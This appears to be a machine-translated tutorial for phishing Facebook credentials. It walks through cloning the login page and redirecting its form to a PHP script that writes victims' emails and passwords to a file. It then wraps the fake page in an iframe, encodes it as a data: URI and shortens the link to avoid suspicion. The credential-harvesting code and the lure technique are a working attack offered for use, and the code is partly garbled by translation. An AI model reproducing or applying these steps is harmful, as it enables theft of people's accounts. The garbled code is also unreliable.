How to Use iframe URI for phishing

This document describes how to perform a phishing attack by stealing a facebook login account. The process is very simple. It mainly involves two steps to create a phishing page, which is similar to the phishing page of The phishing URI and other websites. You can check the method when you are new to phishing.

I. Create a phishing page

For example, if you want to steal a facebook's login account, a total of three files are included: index.html, login.php, and password.txt.

Step 1: Create an index.html login page

First, open the https://www.facebook.com page and copy the source code to the index.html file.

Edit the index.html file and find

<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1" method="post" onsubmit="return window.Event &amp;&amp; 
Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)">

Change the value of action

action=login.php?"https://www.facebook.com/login.php?login_attempt=1"

(Login. php is used to steal the login account password)

Put index.html in the web directory. My files are stored in the/Library/WebServer/Documents/facebook directory)

Step 2: Create a script for stealing facebook accounts and passwords login. php

<? Phpheader ('location: https://www.facebook.com '); // jump to the real facebook page $ handle = fopen ("password.txt", ""); // write the postdata submitted on the counterfeit page to the foreach ($ _ POST as $ variable =>$ value) {fwrite ($ handle, $ variable); fwrite ($ handle, "= "); fwrite ($ handle, $ value); fwrite ($ handle, "\ r \ n");} fwrite ($ handle, "===================\ r \ n"); fclose ($ handle); exit;?>

Step 3: Create the password.txt file that receives postdata

dani-2:facebook leedani$ pwd /Library/WebServer/Documents/facebookdani-2:facebook leedani$ sudo touch password.txt  dani-2:facebook leedani$ sudo chmod a+w password.txt  

Step 4: Test

Log on to http: // localhost/facebook/

Enter the email and password, and click Login

Upload password.txt File

dani-2:facebook leedani$ cat password.txt  

Check that the email and pass fields are the login accounts and passwords of facebook.

Ii. Create a phishing URI

Generally, Phishing uses iframe to cover the original page with a phishing page. The next operation is to generate a Data: URI with this function and convert the URI to a short address.

Step 1: Generate attack code

Src is the address where you store phishing pages.

<style> body {margin:0; overflow:hidden;}</style><iframe src="http://localhost/facebook/" height="100%" width="100%" border="no" frameBorder="0" scrolling="auto">iFrame Failed</iframe

Step 2: Convert the attack code to data: URI

Log on to http://dopiaza.org/tools/datauri/index.php and paste the authorization code,

Corresponding data: URI

Data: text/plain; charset = UTF-8; base64, encoding +

Change data: text/plain in data: URI to data: text/html.

Data: text/html; charset = UTF-8; base64, encoding +

After accessing the modified Data URI, we can see that

Click the facebook icon or the url below (Browse facebook.com) To Go To The facebook fake logon page http: // localhost/facebook/we created in step 1 /.

Step 3: generate data: short address corresponding to URI

Obviously, this URI is too long and may cause suspicion. in the real environment, we can convert short URLs first, such as http://tinyurl.com/just remove this service.

Finally, the victim is tempted to click the URI that will connect to the phishing page to steal the account and password.

Reference: http://www.hackingarticles.in/hack-email-or-facebook-password-using-iframe-uri-phishing/